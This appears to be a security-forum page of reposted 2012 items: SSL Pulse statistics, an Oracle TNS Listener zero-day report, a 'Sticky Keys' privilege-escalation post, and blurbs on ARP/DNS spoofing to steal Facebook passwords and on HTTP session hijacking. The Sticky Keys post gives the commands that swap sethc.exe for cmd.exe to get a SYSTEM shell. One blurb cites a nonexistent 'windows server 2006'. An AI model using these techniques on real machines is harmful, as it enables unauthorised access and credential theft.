(8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis. The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults. Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites). As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. Posted by Ivan Risti? at 16:36:44 in SSL, TIM Sursa: Ivan Risti?: Announcing SSL Pulse

[h=1]Oracle discloses new zero day exploit and launches JDK for OS X[/h]by Chester Wisniewski on May 1, 2012 While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are a Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable. This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008 saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it? If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disable it entirely if it isn't needed in your environment. In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple. Update: At approximately the same time as this article was posted Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant. Sursa: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security

[h=3]Privilege Escalation via "Sticky" Keys[/h] [h=2]Monday, April 30, 2012[/h] This has been documented all over, but i like things to be on the blog so i can find them... You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files. make a copy somewhere of the original on system sethc.exe copy c:\windows\system32\sethc.exe c:\ cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe copy cmd.exe into sethc.exe's place copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe or cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing it would probably be nice to sethc.exe back when you are done. Posted by CG at 12:10 PM Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys

[h=4]Arp/Dns Spoofing Steal Facebook Password (Lan Environment)[/h] Description: In this video i'll show you how an attacker can steal user credentials of every site (in this case will be facebook) in a LAN environment. First of all we use SET to clone the current facebook home page and ... Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment) Follow Me: https://twitter.com/#!/SecObscurity Sursa: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)

[h=4]Stealing Http Sessions With Sessionlist[/h] Description: I run through a quick demo of how to use sessionlist to sniff http session traffic. Following that I use a simple firefox plugin to spoof the data acquired to show full access to the logged in user. Target demo site is facebook.com Download:

[h=4]Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.[/h] Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020). Victim :- windows server 2006 x86 Enterprise Edition Sursa: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.